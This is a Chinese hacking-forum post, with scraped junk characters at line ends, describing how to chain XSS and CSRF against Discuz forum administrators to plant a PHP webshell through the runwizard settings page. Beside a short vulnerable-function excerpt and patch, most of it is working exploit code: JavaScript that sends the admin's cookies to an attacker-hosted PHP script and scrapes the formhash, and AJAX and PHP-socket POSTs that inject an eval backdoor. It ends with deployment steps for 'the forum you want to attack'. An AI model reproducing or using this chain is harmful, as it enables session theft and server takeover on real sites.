Discuz XSS得webshell
0 Y& l% ?2 M$ g. {1 @) nBy racle @tian6.com
: q+ G$ P( p& T$ A欢迎转帖.但请保留版权信息." N% c7 u2 O) L) E1 d5 V- I6 S
受影响版本 iscuz<=6.1.0,gbk+utf+big5$ N3 O0 v: G; I
* G1 l7 }' K/ B/ t0 h% d新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效.
$ R. G% r2 @; p
0 v3 s1 G% {2 t! O# b+ x, u5 a$ v$ @7 ]- E# H4 Q0 W+ q" `1 S
3天前有朋友在论坛问过,说Discuz有个非论坛创始人获得WEBSHELL的漏洞,是superhei早前发出来的一大堆DISCUZ漏洞之一.见原帖:http://bbs.tian6.com/redirect.ph ... 54794&ptid=8706
. C j; @0 w4 B当时我说一会就弄出来给大家,但是实际上一接触,发现这个漏洞本身需要管理员后台权限,要广泛普遍的利用还是很复杂的,主要是以下几个问题,所以拖到今天才基本完工.& j& ^ C1 `7 Q4 |: J* S
) {6 M# j+ u% C: t+ ]分析和写EXP的过程中,得到t0by57,Superhei的大力帮助.他们PHP和JS都不错的哦!希望大家看这篇文章时,更注意分析和明白的过程,毕竟XSS是目前WEB安全的最大头戏.各种形式:XSIO,Cross Iframe Trick,crsf等等..7 [ G7 r* q/ u- m) s
本帖补充其中一个FLASH XSS应用方法:配合Discuz得shell-Flash XSS
3 ?, p" e* q, t4 N' D$ H
3 Q# ~! m& M; y: ]3 u# H7 G* d1 \5 _9 k4 p
----------------------------------------------------------前言分隔线-----------------------------------------------------------------------------
0 i( J6 j6 R/ }
' j+ ]2 M* |/ P# U! n5 {
3 H% K4 X5 X5 O/ Yproblem1:漏洞页面runwizard.inc.php数据提交方式为post.需要模拟POST提交.9 I0 a2 j& Q: V1 k2 A2 r; M, T2 |
" b$ h3 y" A: I i- r9 G% | X
problem2 ISCUZ论坛在数据提交的时候还验证了referer,因此还要伪造一下.php socket和js都可以伪造referer.4 ]* ^* D% u2 `/ x" _2 S& m- i
: P/ e6 ?/ I* N0 b. u7 o
problem3:formhash()函数采用了用户名+密码+XXX的算法得出,程序本身没办法模拟算出来,于是又耗费了我一段时间,最终想到个傻办法,从源代码里读出来.呵呵.这里是参考了superhei的一个旧EXP想出来的.; k# O, ^ V; i7 D! h1 K* W
; H# Z1 k* N1 Z9 t; P: g' X( C
9 t+ y7 ~5 s8 V
下面,我为大家简单说说这个漏洞的成因和补的办法.这里是有漏洞的文件代码:bbs/admin/runwizard.inc.php,里面有个函数function saverunwizardhistory() {5 w" o+ C0 N* d$ p* A* i' k7 J0 M% f
$ B/ V% J1 i# J1 K# N global $runwizardfile, $runwizardhistory;
- F( N2 e# }3 ~& W4 J+ r% O; w. e; W, K% S" j
$fp = fopen($runwizardfile, 'w');% T8 a7 |+ s+ i2 N" O2 E2 P
5 g& K3 |1 o8 t6 {& S fwrite($fp, serialize($runwizardhistory));
* h# M4 {' g2 F8 Z6 T$ h
2 [8 W6 w- H; T fclose($fp);. ]; q n+ W' |7 q& F' h7 K9 r' i$ y
@* M% |* S$ K" R# ~! C& P9 r. d
}
3 E E, g! M1 E4 y5 B0 ?2 f复制代码serialize($runwizardhistory)直接就写进$fp里.runwizardhistory是什么呢?是论坛一些基本的配置信息,譬如论坛名.反应在论坛后台,位置是:discuz.com/bbs/admincp.php?action=runwizard&step=2.论坛名称,地址等三项信息都没任何过滤.该三项内容任何一项都可以直接写入一句话,提交,然后保存在缓存:bbs/forumdata/logs/runwizardlog.php里." [1 _( G0 s( q
以下是修补的办法:function saverunwizardhistory() {
d' |3 f9 F8 K0 f! F* D! ]3 p8 D; [4 E4 n: n5 s
global $runwizardfile, $runwizardhistory;( n) E# h' P: {6 D& Y
. E9 F$ O, v7 V" F! T; @# y/ l+ F2 ~
$fp = fopen($runwizardfile, 'w');( F' ?% E3 L7 ]: T
1 n/ b. |! h* { $s = '<?php exit;?>';. {' C! `/ V9 V4 m9 D# B
* C; F4 \! J7 F7 \7 U" y
$s .= serialize($runwizardhistory);
' H0 ?/ A: L9 f5 X* b- ?. h5 ?& C2 [9 t/ |
fwrite($fp, $s);. k4 X1 x6 E5 H; d4 l$ o% e
7 }+ Q: B) S5 | h+ S
fclose($fp);0 i: `5 s% W! j7 H
/ g# u5 t7 t5 m4 G* @# ]/ P8 J}4 p9 [) g0 @, m% G+ G/ V* B! r$ B
复制代码加写 '<?php exit;?>';到最前面,退出并且忽略该文件后面所有PHP代码.这么即使里面有一句话,也不能再被执行.
/ N- ~# r" u5 L! d+ ?8 j9 d6 `# z& l# d. u# r' g0 @2 ]
" S1 c( i# F' v9 Q
+ q0 t$ {% |$ ?( m----------------------------------------漏洞的成因和利用方法分隔线-----------------------------------------------------------------------------
% S" ^9 K6 r: m! q% i% i0 z& e/ ]+ E! {7 d# L k! b' V% g
+ X7 U( d, h9 f/ N0 U' K" m" b$ Z3 O8 A
以上是该漏洞的成因和利用方法.大家看到这里,估计也认为这是个鸡肋漏洞了吧,首先要有管理员权限,有后台权限,然后才能上WEBSHELL,实话说,有后台权限,拿SHELL的办法也并不止这一个.所以这个洞的价值,看起来就不大了.当然,这个已经被发布的nday不是我本帖要讲的重点.这里我主要是想告诉大家,将XSS,Crsf和本漏洞联合起来的办法.这样该洞价值就大很多了.2 J6 K) o0 T7 z4 B. U/ h& b
' m4 W- k" C4 a7 y我们的思路是:论坛上有个xss点,Crsf flash(的确有,Discuz! member.php xss bug,Discuz! 数据库错误信息xss bug,Discuz! flash Crsf bug,Discuz! admincp.php xss bug,Discuz![flash] xss bug),管理员点击或浏览后,就执行了我们的JS,带他到外部一个JS中,通过JS获得他的COOKIES,获得他的HASH,然后经过外部一个PHP封装SOCKET以POST的形式提交前面说的动作,如果论坛没有补上该问题(目前没几个论坛补了.当然,天阳已经补了.^^),那么就会产生bbs/forumdata/logs/runwizardlog.php这个WEBSHELL." f: N4 ?* k+ l) n! P% @% ~
& o" u K) V% |* a5 ]9 [这篇文章主要不是给大家个EXP,然后让大家拿着到处乱黑的,主要是讲方法,讲思路.因为这里学问不少.
/ \, d1 q9 c, m0 h+ F5 ~8 I! w3 D! N! o# c* U6 ?
首先我们要看,怎么通过JS,获得管理员COOKIES,然后把COOKIES传递给最终提交的PHP.获得的办法相信大家都知道,但是传递的办法,譬如以图片形式传递,就非常稳定和实用.是实现AJAX本地语言到服务器语言PHP的好办法.JS部分代码:
) U; A. W4 L9 u* n0 w& R: R4 q& C" v" f9 w% ^ f. u6 H& [
var url="http://目标网站/admincp.php";
; F& V7 ~) g Y2 y# w! ^7 A2 i9 b7 B+ B* D
/*获得cookies*/; h$ e( s& q2 v$ ]6 i* `& h+ @
) f8 N7 U0 G2 ]9 @6 o$ W5 Ufunction getURL(s) {1 C# Z7 y/ L2 A: u7 U: G+ ] u8 ?
2 q, m1 y; Z8 ~4 h4 @( Hvar image = new Image();
% x! _0 D+ R! C9 I
" H5 C- L2 w+ _image.style.width = 0;$ |7 r. t4 J% Q8 | V( W
" T2 e, }' u9 e6 k
image.style.height = 0;
, y$ K8 F* l N A) O) _( [8 ?" K' {/ T- G% ^8 w
image.src = s;2 W* B: {( a. c9 R! G
, t8 q% @# X( ?& f4 M. A}$ }' Q* k1 f+ B5 i+ o# a
2 X& m) {% P c f1 e$ N% VgetURL("我们做好的接收cookies的.php?x="+encodeURIComponent(document.cookie)); //这里就通过image变量传给了php
& V; [ Q+ | u0 e9 M. s' O. h复制代码php以get方式接收过来的变量.$cookies=$_GET['x'];9 _+ J4 ~$ o/ @
复制代码同理,hash我也是这么传到PHP里.不过HASH的获得方法也是很有意思的,众所周知,discuz有formhash来保护每个授权访问的唯一性.但是你也可以发现,在论坛页面用户退出的地方,引用了这个hash.我们要做的,就是从页面的源文件里搜索出hash,筛选出来,传递给PHP即可.筛选的办法很多,你有兴趣的话,可以看看我的筛选JS代码(而且这里discuz其实还留了一手,呵呵) 
" O* S7 X1 D/ R- v' N, e/ K ~) ]+ b9 A- u2 n6 u1 a, F
+ N2 ]. x( t9 u+ M' Q4 W2 k8 Q7 V
获得了cookies和hash以后,我们需要结合完整数据,做一次模拟提交,大家可以看看,这个是我之前写好的AJAX提交方式:var url="http://tian6.com/raclebbs/";# O) U8 {, j5 T3 ~4 e
# h8 `4 b! ^; m5 l2 @
6 a( ^- C, r" z- t
4 q! `! _' l, ?( {! N+ w4 x
/*hash*/4 F1 E+ }8 x* I- @9 s( M
5 N6 ~- ~; B! _1 S: t1 d. ovar xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.3.0");5 ~. }. Y8 L" c0 X
) n4 F$ n0 l: n c c
xmlHttpReq.open("GET", url+"admincp.php?action=home", false);
~! `1 s) ?4 S0 U/ T) U/ g3 R" c
xmlHttpReq.send();
( U, N; ?# h3 E
/ E4 K( M9 w' d" Cvar resource = xmlHttpReq.responseText;# F! R/ E7 ^ g& s* t3 c( Y* C) X% k
3 s6 s7 z/ Q" f: V, T6 e+ u
var numero = resource.search(/formhash/);
2 `0 Q9 |- E3 [" X6 m M3 [3 R. |+ m8 t- k* {. l5 T
var formhash=encodeURIComponent(resource.substr(numero+17,8));5 r- Z3 p. W: ^0 ~7 C" s2 y2 S
5 }3 l4 T$ R/ `9 d2 h. z: X6 q% k
8 i8 i- Q! n" X C6 d: x7 g' k
/ _7 u6 I) Y# P" Q# J! e. Q) Yvar post="formhash="+formhash+"&anchor=&settingsnew%5Bbbname%5D=1&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5";//构造要携带的数据
6 H, m. A0 @5 ^" [! Y! ~
, ~2 v% C) r) F, g# W1 f6 v$ e# UxmlHttpReq.open(" OST",url+"admincp.php?action=runwizard&step=3",false);//使用POST方法打开一个到服务器的连接,以异步方式通信
, B. I% n) A0 b6 P5 i, ?" w9 Z
8 j$ k! A& A" Y' X3 A; IxmlHttpReq.setRequestHeader("Referer", url);
4 m. _3 _. g2 }2 H
! n. H ^7 |7 g! CxmlHttpReq.setrequestheader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");
~, y& H& g4 B: T% J! }3 p2 M( @5 C
xmlHttpReq.setrequestheader("content-length",post.length); + N" \6 x# j- ]9 a) p$ U
3 \1 m+ R4 y8 R0 q" V. q1 d' X
xmlHttpReq.setrequestheader("content-type","application/x-www-form-urlencoded"); : v S" r6 r; f
+ @! M2 s2 \3 l3 R% b+ o
xmlHttpReq.send(post);//发送数据
q0 c2 T/ i- h% H2 Z# E) x2 Z5 Q复制代码这里HASH我假设正确,这样提交,也无须cookies2 w: k! e; I9 h7 H. b6 s0 u! ~5 ]% n
7 H9 ~( ?* h0 e( d再看看以PHP SOCKET形式提交.$sock = fsockopen("$url", 80, $errno, $errstr, 30);
% c3 x7 t2 Y: H% e# M' H$ K2 \7 K
; Q( e! o+ m: H* a4 g6 O3 vif (!$sock) die("$errstr ($errno)\n");
/ K5 `0 X4 ]% q1 N! {. b) R; f. q: R. }) f: n6 N: x
$data = 'formhash='.$hash.'&anchor=&settingsnew%5Bbbname%5D=Discuz&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5';
1 ~' g3 i: w( S. U4 {& j5 h
' R; _/ S' l+ w" Z7 }! s% w Z* ^9 ?2 s- c7 V
8 }, X( z, z/ n, r$ C* B! I0 {3 p
fwrite($sock, " OST http://$url/admincp.php?action=runwizard&step=3 HTTP/1.1\r\n");) x% C- D. Z6 |$ \$ \
+ v7 |0 X+ k! C- n
fwrite($sock, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*\r\n");3 Y4 z- Z% Y7 ~' B# J* @. F
! m' d! F8 R# o9 ~8 R
fwrite($sock, "Referer: http://$url/admincp.php?action=runwizard&step=2\r\n");
7 A$ N- N$ w( L- p/ A( G c" V2 r$ c
fwrite($sock, "Accept-Language: zh-cn\r\n");
7 j0 c4 {/ ~: U: B4 Z2 h) h9 `7 d* s* U) C8 s2 {$ \# U$ g, ~
fwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");
" `8 }2 R; A; S
" ^$ E' z( N* q! a$ W0 xfwrite($sock, "Accept-Encoding: gzip, deflate\r\n");" \ _" Z; `: S$ b* C& J+ h' h6 i
; t7 Q. K, I& Q: M* s$ y
fwrite($sock, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n");8 @" `# U- ^( y R+ i" w4 X# H& S8 X
5 i' h% ]& _3 K& d* I0 Bfwrite($sock, "Host: $url\r\n");
0 i1 v r1 w0 V& ?
/ t0 L1 P! M& X5 v3 Pfwrite($sock, "Content-Length: ".strlen($data)."\r\n");
: M6 G4 l3 I2 h, l
( v- C5 Y7 T! P8 f1 o/ y5 g ufwrite($sock, "Connection: Keep-Alive\r\n");
, g& ?5 q9 k5 D
+ `( J% a5 \- v1 J% |/ jfwrite($sock, "Cache-Control: no-cache\r\n");
( Z" ~1 B1 v t) M3 m) x
9 Y% C: K) n, J6 u. t7 z/ wfwrite($sock, "Cookie:".$cookies."\r\n\r\n");% i& w6 T2 X( h5 v- |& l; `
- C' g9 f* i" J, J5 mfwrite($sock, $data);7 ^9 k) h' @$ w1 o+ w9 R
2 | S+ O- V: R; j1 ]0 a
, i0 V8 C% a6 B8 h3 p" {
* F: g( ?/ ^, Z4 r$headers = "";3 T i* |/ W2 h1 }8 b" E
h/ q& d0 [9 i/ l z/ v- O0 p- ^9 Rwhile ($str = trim(fgets($sock, 4096)))
0 c( D" v+ d7 j: j& @6 a5 A$ }
6 W9 `9 j- V% t9 O4 B: `* g $headers .= "$str\n";
' W3 K. s; z6 |# A: G4 k0 Q) H$ Q p/ a4 [% M1 o
echo "\n";
+ k# W1 i! ^0 U- P
& ?, e! e2 q9 I$body = "";
3 U9 O& K7 W% x$ A3 H, |
# @, \+ h! E Z3 T/ d Uwhile (!feof($sock))) q: l2 I x1 X6 c
/ x, G5 _+ }0 m% ^! }3 M4 [ $body .= fgets($sock, 4096);7 A W' T) @" M% m% K3 X: o
% g- _( X4 h" D' E5 |9 ~fclose($sock); n3 F* e/ o3 \4 H
3 W7 ?, K4 f& T- ?6 h" A: secho $body;
2 P5 E: |; O: W; N/ e复制代码整个漏洞XSS应用大致如此,下面附上JS文件,PHP封装好的提交文件.利用文件限制一下,已注册用户才可以下载,刚来也没关系,仔细看看前面的分析,你也差不多能写出来.^^" |. ?; O7 p- k/ o% l
5 O; s4 Q/ {4 T1 Y1 |( @3 p5 O; F. Q& N+ ]/ `( T' u
-------------------------------------------XSS文件分析分隔线-----------------------------------------------------------------------------8 H5 O+ }! A/ L. a3 {" Y( P
1 N/ t0 O& I7 b% B4 B* t3 s; H" p! e4 T* E- u2 ~
1 HP SOCKET利用方法首先打开racle.js3 P/ Q9 a1 B- B: U2 V6 |; `
1 |3 w9 z/ y5 `# J) S' [, `- _3 Bvar url="http://tian6.com/raclebbs/admincp.php?action=home"; //改成你要XSS攻击的目标,譬如http://www.discuz.com/admincp.php?action=home! J7 O! p7 n) `6 R
, ?% s" p8 y# G" A7 Y1 d
$ o2 q* G0 J# f9 }. \# E' i" Y: \) y) D: I
然后打开racle@tian6.php
. ^ l7 k6 d1 S& ~+ ?
" ^. j3 J, |2 T$url="racle@tian6.com"; //改成你要XSS攻击的目标,譬如www.discuz.com
$ E8 i- q- ^* Q5 r& s$ k: H8 c* Z1 T5 j1 Z' l: `/ U8 ?* H1 o
( b _- K4 c5 m$ E% h
2 e" z, Q( c& Q# i$ A. K
如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:
3 S" ?( Q4 v$ M3 j z) x
* p9 A* E3 R& M+ kgetURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+17,8))+"&x="+encodeURIComponent(document.cookie));8 g0 ]7 G% e9 l4 P" s R1 C
* S5 X+ O: H" a+ C* ?为' {- |8 S1 q" H1 h# ]
% K6 H5 G) d+ F8 z2 b
getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+9,8))+"&x="+encodeURIComponent(document.cookie));
7 X/ d9 W- }7 Z8 w. K复制代码2:JS利用方法打开ajax-racle.js,修改var url="http://tian6.com/raclebbs/";为你要攻击的论坛地址.
5 _/ n2 v) _' h" z6 k$ i* m) I
( R4 N. S8 O: B6 h/ }2 h
' n7 G& a4 A9 F9 X4 b6 b5 t/ t- W+ q7 K9 R7 y
如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:: t( {' o6 A& b" L6 C k
3 y: z) u0 }: @! I
var formhash=encodeURIComponent(resource.substr(numero+17,8));7 \& i3 V6 C# `3 s d* P' v6 A8 M# A: h
! m4 b/ p s# d7 W" x) u5 F( z. H
为
" P# [% h) O, M' L( Y( v7 n# H, l9 L3 N
var formhash=encodeURIComponent(resource.substr(numero+9,8));/ z) Q( b% P+ d5 z0 H: ?! \
复制代码ok.以上两种方法则其一.在攻击前,我们应该先看看论坛打上补丁没有,你可以尝试访问:http://target.com/bbs/forumdata/logs/runwizardlog.php,如果一片空白,那就没戏咯.不是空白就会有些论坛信息出现,但也不代表就肯定存在漏洞,因为可能人家补过之后没有更新过论坛信息而已.目前来说,有8成把握吧.
* P; S+ @9 y6 x/ I( r
8 T% @3 k& E6 ]* x" _% v$ @如果是第一种方法,就把racle.js,还有racle@tian6.php文件上传到一个可以执行PHP的地方,譬如你以前拿下的WEBSHELL里.两个文件需在同一目录下.记得该空间要支持PHP.然后在论坛以<script src=http://你放好的地方/racle.js></script>构造好XSS点.
/ U% S, Z7 U/ W. e! V1 ?- m( M& x$ Z; x' N% j9 \
如果是第二种方法,就把ajax-racle.js,上传到一个你以前拿下的WEBSHELL里,然后在论坛以<script src=http://你放好的地方/ajax-racle.js></script>构造好XSS点.5 z# F: ^$ K! X: G, U
2 f7 e9 {. Q, e6 D; W* O: e' x
不管你用什么方法,等到管理员一点该连接或者浏览一下论坛,他论坛bbs/forumdata/logs/runwizardlog.php里就多了个<?php eval($_POST[racle])?> ^^.赶紧拿控制端连上去吧.
1 A' F8 [' d' g) \! P % Z. I4 N$ O' o* ^, Y9 K2 b
|